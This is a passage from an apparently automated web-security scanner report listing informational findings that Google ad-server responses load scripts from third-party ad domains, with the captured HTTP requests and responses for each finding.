ZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYArgDwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqty_kivWyoJD_Hr1F2kWXBBBlx7Kqg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.169. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676549&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658549115&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658549122&frm=1&adk=2614322350&ga_vid=574713569.1303658549&ga_sid=1303658549&ga_hid=1439411518&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:22:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25615591&ahcid=781458&bimpd=0DJCOea7tQaPEXcsrHCGvbJ50l01mKSguUhbpQoeH0RWhqpfXKSPD0-MFPpVBPU10m7tT2_9tEc5CKS7Skz1aq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BDkvQ6eUL3X8PfnSnaGsp-uk-XYrDlOOeRoBgVlRm5kMDlByLclETPpBR0VIG2dC6a9Q7FgriWjdrLAU7A9qPMdWscBjIiCiOms451jrCwDdtZPZ9Ju5iYKDVU3obChYLLzf464GptzhEx9p1rrX3KW3vX64t9pV4q8g0-D_Ww98PQ132Ppbuk7ijoUndfzz7rNfyLeQH5Gio5Do8v242vKJ6CYR718wQw9XuMOxHtEN8BBICX6F00yJ7PyUVTqmTQaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-cyT1LhRsTuEogXW-yxzh0vfOgMJJgzaqMcTcfaNoC7PX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3gYR-TIJOv7LUxnRCA3B1881InA3TgJhUy39fsTN9KR4PAbDv3_uGCXV0Te9AyFL5Xt_T370WDWWY1SqEwEJwbhn-ZNI0MTk2TjTf5ElUcAOcWpSmQvUNv3Xnc2JdM3M-BA9y0FUzpqtDC0K6uSmpOagRBN5xins51mVi5acEHrzqo408BxR9uazB8jKSDnLvk&acp=TbRAMgAB9HgK5TqFIPdMcQuNKMEfW-AFpdRoCg&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.170. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:36:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1814

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=MzMzMzMzB0AzMzMzMzMHQAAAAEAzMwdAMzMzMzMzB0AzMzMzMzMHQPAItQ9TsS9xSsYda6b2ziVTGbRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAwQ8BAgUCAAQAAAAARhgj9gAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303648621%29%3Buf%28%27c%27%2C+45814%2C+1303648621%29%3Buf%28%27r%27%2C+173254%2C+1303648621%29%3Bppv%288991%2C+%278155932420495182064%27%2C+1303648621%2C+1303691821%2C+45814%2C+25553%29%3B&cnd=!uhNGHwj25QIQxskKGAAg0ccBKEsxAAAAQDMzB0BCEwgAEAAYACABKP7__________wFIAFAAWJsWYABolgU.&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbQZUwABwKsK5XZJlG1pwvDEXvW-18JcJH4eRw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBo5onUxm0TauBB8nslQfC07WjCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAowGwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtwwdyFN9lkGyxP0bKo4MqMf78G0iw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.171. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-9314328132562548&output=html&h=90&slotname=1448208227&w=728&lmt=1303690679&flash=10.2.154&url=http%3A%2F%2Fwww.fightidentitytheft.com%2Fcredit-monitoring.html&dt=1303674266988&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303674267047&frm=0&adk=3080309030&ga_vid=2066914421.1303674267&ga_sid=1303674267&ga_hid=1211426090&ga_fc=0&ga_wpids=UA-192617-1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=907&fu=0&ifi=1&dtd=81&xpc=Xfv9WHuQ2F&p=http%3A//www.fightidentitytheft.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 19:46:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14207

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0033cc;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

24.172. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681462&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663462279&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663462290&frm=1&adk=2614322350&ga_vid=893085860.1303663462&ga_sid=1303663462&ga_hid=2122288689&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=13 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:44:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919894&ahcid=1089763&bimpd=739JIzvALy56eDDqJQS39FR8J9WhYwrxnROzWwCChnM9XoWQAkLU_2ggLq50jQG2LGgelz04ch13nml8chQ9uK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BCYYVaq6NvAn4T5JhFfjdzo9r9qSXhVfD-RlEq2Lb7tPlgHBzIj8H9loLjUdnhyPRc4RN-inI8pEqAxH2vizLBnrnjs0ppxGD7r18ENzxp2MffKaMqsZ1enCHl2qau2b7kvy-fr5_dAE21DMbixvFmdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPge7R7oyaDl40Wj8djiGyN5ei3VHa01VsmgGuwFyNi4D1jqGYNVEoTZiB8PgDyUCTlavce-0U6tnxWFnMP5mj9WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPetZOHC1kzE7ePsUwQvuAGkx5nm0lTjSklndxOrj4-IjIy9HCzfG1V190a4drUYjlO73wc-cQ7FRKnITKYzO3zYV0Lx85IfstsDOG1d7FMwKtoByWRKoQ3oF0AT_2N-Em_vTLcUD7lSWQB1A1_8OQ2ozt_T370WDWWY1SqEwEJwbhXPDssQGIF1ab8xpzk0MIKO0jwsuV5-UswDl8uj67vk85SgEEswKh1LTzH1WJY68rH5O2l4omHA8aqpEYcTYQNao408BxR9uazB8jKSDnLvk&acp=TbRTYwAFqPUK7F3E0PZOG9h8rZtVuJUm3zJKqQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBXfM-Y1O0TfXRFsS7sQebnNmHDcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtyXQUZBWUf8zmRZwI-2CksJq62GXg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.173. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658599151&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658599159&frm=1&adk=513358139&ga_vid=955713783.1303658599&ga_sid=1303658599&ga_hid=1255304632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=11 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2137

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689665&l=728x90&aid=25818769&ahcid=986337&bimpd=fvqWk9E7aKARqlPGoosJXpdA8tM0WuoTZOFWbt8juMrkbYeyOJZYseXQhJl-D8dZ1W8j3AWyyRt_S4xWx1Wocq9niBJoz6621irB3f190hVoi5oxQPyCItoVSlkU2GiEKa7xi-Yh-L5zIgjO7n9XM9W-SvPVZ9uvWN6QKCcGWsFt1AnXVvRUHCS3x0AwhdfJrH0SK8FW6VcT2pkB7RfPtoc5ouwqR_rUxEmpjLbn_kGIlmyImarU-piwr0Jt0WhoGLqsZmaJeMzvP2wO9dmfzLdujv620HmwyC87B22XsEDnjvFkbfDhOTBqKi71LuQkPN61H_pRF_QxxnLkwBnFkRrRdyRa2Vn_6BjzH-FFxuCiWvQM-mTsg-ZlkzhHNNwTCcJzEb1qj5xmeir2G5gfeX3im_YGwEoKshG4ob_yn457bS2HEfMO6qa0Gwjcoyk4eB3x2ve04_d-saB0rPeqGTn1FAv89x4axE5Jcvz3NtGNXHmwdmZPdbayfYow3TS_pRffsD1QMAPrsB9Edfeqxoyc-pC_2W_bc6ewxhFwGvHUoPaaHnaoorULvxTzi44m1_Si-euS0zvZ4Sy6x3y4oBWPJSpYQc9hMA6Upo39y-px8dz54g50gXlKFn0w_61FWrucAA4n2-3CMAbQ96XgsdMp68CY-i0F0mEcU4d3dpJcURMhRM2LhpW-3_PATP0lCcTuEpgm1oB6Mt98YrnVmAXvL6koORN8ahDMn98RAsmwrRTD9o2SJxjqGPytYYwfCTWuOI6iK62k4xtoN-1-5A&acp=TbRAZAAC2tsK5XbqIPpc8lxQHpbwNolfLMpt4g&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.174. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676458&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658458620&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303658458624&frm=1&adk=2614322350&ga_vid=648576074.1303658459&ga_sid=1303658459&ga_hid=197278331&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1923

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbQ_1wAJrvsK5XTDK_JR_mk9Pq5oBkh-6BZCyA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.175. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676602&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658602580&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658602586&frm=1&adk=2614322350&ga_vid=1898243012.1303658603&ga_sid=1303658603&ga_hid=226900712&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=Ip0ebvHq9-6cmCR2bXP5_fNx2AR3sIhp4p39Iz_V0Qg2ZWiQd3tT9BFQw06IP9QqBnjrxaFOX3A2Mp5hsqmn769niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloDYQQhNu9aqv6NqLy9PboSDUcW3gy4ahk2mxvXjqV_8HMdltWoLJ0ZRSlLXDIZEn8XYkMwDMhThyDTSkJz17--sccgy0lyoFcbjisrOYNESdVweqa0CK0OT2RuObPoCPAYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7lBPY5bJrxpuGqREB7_HXzaHnXpMPSYaXk1bDrduuz7117nSKtRoDtj2nylqWO-cGwaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3gTaS1w5xhX3951duqXeD-FccmVnaGRMAMpWrCzFs9XNyZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74b